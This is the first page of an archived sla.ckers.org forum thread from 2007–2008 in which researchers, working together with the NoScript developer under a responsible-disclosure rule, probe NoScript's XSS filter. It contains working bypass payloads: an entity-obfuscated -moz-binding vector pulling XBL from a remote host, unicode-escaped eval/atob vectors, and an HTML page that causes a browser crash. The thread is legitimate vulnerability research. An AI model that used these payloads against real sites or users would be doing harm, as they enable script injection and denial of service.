Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: 12Next
Current Page: 1 of 2
Hacking noscript
Posted by: Gareth Heyes
Date: November 07, 2007 03:35AM

Ok people here's the challenge...

Execute Javascript whilst a site is untrusted
OR
Create a XSS attempt across sites which isn't caught by noscript
OR
Bypass content protection (Flash, frames etc)
OR
Cause DOS

IMPORTANT RULES UPDATE
----------------------
One week private notice to ma1 before public disclosure is required.

Let the fun begin!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 3 time(s). Last edit at 06/16/2008 09:50AM by Gareth Heyes.

Options: ReplyQuote
Re: Hacking noscript
Posted by: asrail
Date: November 08, 2007 02:36AM

I can't seem to find the sources for the noscript extension - anyone got a url? The website http://noscript.net/ itself does not give any information about "how to contribute" aka "how to white box test for vulnerabilities".

Options: ReplyQuote
Re: Hacking noscript
Posted by: Anonymous User
Date: November 08, 2007 07:12AM

Just open the XPI file with Winzip or another archive manager.

Options: ReplyQuote
Re: Hacking noscript
Posted by: ma1
Date: November 09, 2007 02:49PM

asrail Wrote:
-------------------------------------------------------
> I can't seem to find the sources for the noscript
> extension - anyone got a url?

.mario Wrote:
-------------------------------------------------------
> Just open the XPI file with Winzip or another
> archive manager.

Please always use the development build.
Patches are welcome, too.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Hacking noscript
Posted by: Gareth Heyes
Date: November 25, 2007 02:03PM

This seems to beat noscript XSS protection filtering:-

<div style=&#x2D&#x6D&#x6F&#x7A&#x2D&#x62&#x69&#x6E&#x64&
#x69&#x6E&#x67:&#x75&#x72&#x6C&#x28&#x2F&#x2F&#x62&#x75&
#x73&#x69&#x6E&#x65&#x73&#x73&#x69&#x6E&#x66&#x6F&#x2E&
#x63&#x6F&#x2E&#x75&#x6B&#x2F&#x6C&#x61&#x62&#x73&#x2F&
#x78&#x62&#x6C&#x2F&#x78&#x62&#x6C&#x2E&#x78&#x6D&#x6C
&#x23&#x78&#x73&#x73&#x29>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Hacking noscript
Posted by: ma1
Date: November 25, 2007 04:00PM

@gareth:
Thanks, malformed entities (no semicolon) are an ugly beast, we're lucky NoScript already forbids cross-site XBL.
A version handling any entity Gecko knows (or believes to know) is right on its way ;)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Hacking noscript
Posted by: Anonymous User
Date: November 25, 2007 04:34PM

How does it work Gareth? can't seem to get it to work here, a hint would be nice.

Options: ReplyQuote
Re: Hacking noscript
Posted by: ma1
Date: November 25, 2007 05:11PM

@Ronald:
it just gets (loosely) parsed as
<div style="-moz-binding: url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss);"></div>

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 11/25/2007 05:11PM by ma1.

Options: ReplyQuote
Re: Hacking noscript
Posted by: Gareth Heyes
Date: November 25, 2007 07:14PM

Sorry Ronald I should have explained the vector more.

The reason it probably didn't work is because it's a mozbinding as Giorgio said and also I had to split it onto separate lines for nice display.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Hacking noscript
Posted by: ma1
Date: November 26, 2007 04:23PM

NoScript's standard XBL protection should take care of these attacks even if they evade request filters, but for consistence sake I've just released a development build with improved filters and more flexible XBL settings:

http://noscript.net/getit#devel

Thanks Gareth :)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 11/26/2007 04:33PM by ma1.

Options: ReplyQuote
Re: Hacking noscript
Posted by: Gareth Heyes
Date: November 26, 2007 05:41PM

No probs, just for your reference expression based XSS injection also works on IE7 using entities :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 11/26/2007 05:41PM by Gareth Heyes.

Options: ReplyQuote
Re: Hacking noscript
Posted by: Gareth Heyes
Date: December 19, 2007 10:21AM

This beats noscript's XSS protection:-
hxxp://demo.phpids.org/?test=%5Cu9999%3Dalert%0A%5Cu9999(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 12/19/2007 10:22AM by Gareth Heyes.

Options: ReplyQuote
Re: Hacking noscript
Posted by: ma1
Date: December 19, 2007 12:14PM

@Gareth:
clever, thanks :)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Hacking noscript
Posted by: ma1
Date: December 19, 2007 07:09PM

@Gareth:
it's fixed in the current beta.
Could you hammer a bit more before I release it in the official channel?
Thanks again :)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Hacking noscript
Posted by: Gareth Heyes
Date: December 20, 2007 03:20AM

Yeah sure I'll check it out :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Hacking noscript
Posted by: Gareth Heyes
Date: December 20, 2007 04:19AM

@Giorgio

The development version is much better now, good work! :)

I tried loads of stuff but it looks like you've got the unicode vectors covered now, noscript detects these:-

\u50001 \u0073\u0065\u0074ter=alert
\u50001=1

\u5000\u003d\u002fYWxlcnQoMSk=/\u005b\u002d\u0031\u005d\u000a
\u0030\u005b\u0027eva\l'](atob(\u5000))

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Hacking noscript
Posted by: Anonymous User
Date: December 20, 2007 04:21AM


another one:
top?a=eval(name):0
http://demo.phpids.org/?test=top?a=eval(name):0


me stupid - sorry. had the option disabled (slaps himself)



Edited 1 time(s). Last edit at 12/20/2007 04:27AM by .mario.

Options: ReplyQuote
Re: Hacking noscript
Posted by: Gareth Heyes
Date: December 20, 2007 04:27AM

@mario

Seems to be detected by the development version

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Hacking noscript
Posted by: ma1
Date: December 20, 2007 12:15PM

@Gareth:
Unicode vectors were already screened by stable version if they used the ASCII range (\u0000-\u007f), because that was a blatant obfuscation attempt.
Your vector passed first screening because it used the topmost Unicode set, and still wouldn't have passed the JS detection if it wasn't for an over-optimization of my pre-syntax check stage, whose purpose is avoiding SpiderMonkey hits when a string is "obviously" invalid JS -- but obviously, SpiderMonkey knows better than me ;)

If you can't find anything else, I'm gonna release tomorrow.

Thanks again.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Hacking noscript
Posted by: krazl
Date: January 01, 2008 10:50PM

JAVA PURE EVIL?

http://www.krazl.com

Options: ReplyQuote
Re: Hacking noscript
Posted by: Gareth Heyes
Date: January 02, 2008 08:02AM

This causes DOS on my computer, I haven't confirmed it on another one yet:-

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>Noscript DOS Crash</title>
<style type="text/css">
@import 'data:text/css, * {-moz-binding:url(http://somefile.xml#xss)}';
</style>
</head>

<body>
</body>
</html>

This could be a noscript or FF problem

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Hacking noscript
Posted by: Anonymous User
Date: January 02, 2008 08:11AM

Doesn't work here, could be a NoScript issue cause I don't have it.

Options: ReplyQuote
Re: Hacking noscript
Posted by: Gareth Heyes
Date: January 02, 2008 08:16AM

Yep I've tested it on another machine without noscript and it doesn't crash. I'll try and confirm it with noscript installed on another machine.

Update...

Tested and it appears to be a noscript DOS problem. It closes the browser completely on my test machine :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/02/2008 08:19AM by Gareth Heyes.

Options: ReplyQuote
Re: Hacking noscript
Posted by: Gareth Heyes
Date: January 02, 2008 08:26AM

Here's the POC remotely hosted:-
http://www.businessinfo.co.uk/labs/fun/noscript_css_crash.php

Confirmed on 2 computers (different platforms)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Hacking noscript
Posted by: Anonymous User
Date: January 02, 2008 09:10AM

Nice job Gareth, interesting vector btw!

Options: ReplyQuote
Re: Hacking noscript
Posted by: ma1
Date: January 02, 2008 09:20AM

Not NoScript-specific, actually:

http://evil.hackademix.net/pocs/xbldos

A NoScript-specific workaround is on its way, preventing also this bug from being exploited on untrusted sites.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Hacking noscript
Posted by: Gareth Heyes
Date: January 02, 2008 09:40AM

@Ronald

Thanks I was gonna do a blog post on @import but I couldn't be arsed, also I thought it was well known anyways.

@ma1

Cool glad a fix is in the pipeline :)
Nice recursion mod :) works without noscript full DOS hehe

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Hacking noscript
Posted by: Anonymous User
Date: January 02, 2008 10:13PM

@Gareth,

Yeah I knew about @import, but this snippet was quite cute: data:text/css ^^

Options: ReplyQuote
Re: Hacking noscript
Posted by: ma1
Date: January 03, 2008 02:55AM

NoScript 1.2.3 dev build

v 1.2.3
=====================================================================
+ Improved Injection Checker JSON compatibility, now recursively
checking content of string attributes
x Further JS syntax check optimizations
x Fixed potential XBL-based crash after successful -moz-binding
injection (thanks Gareth Heyes for reporting)

x More discreet XSS notification for subframes

Of course, it also protects against the aforementioned generic scriptless XBL crash.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Hacking noscript
Posted by: Gareth Heyes
Date: January 03, 2008 03:07AM

@Ronald

Yeah it's quite handy, if there was a way to use it inline that would be cool.

@ma1

Cool I'll check out the latest version

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Pages: 12Next
Current Page: 1 of 2


Sorry, only registered users may post in this forum.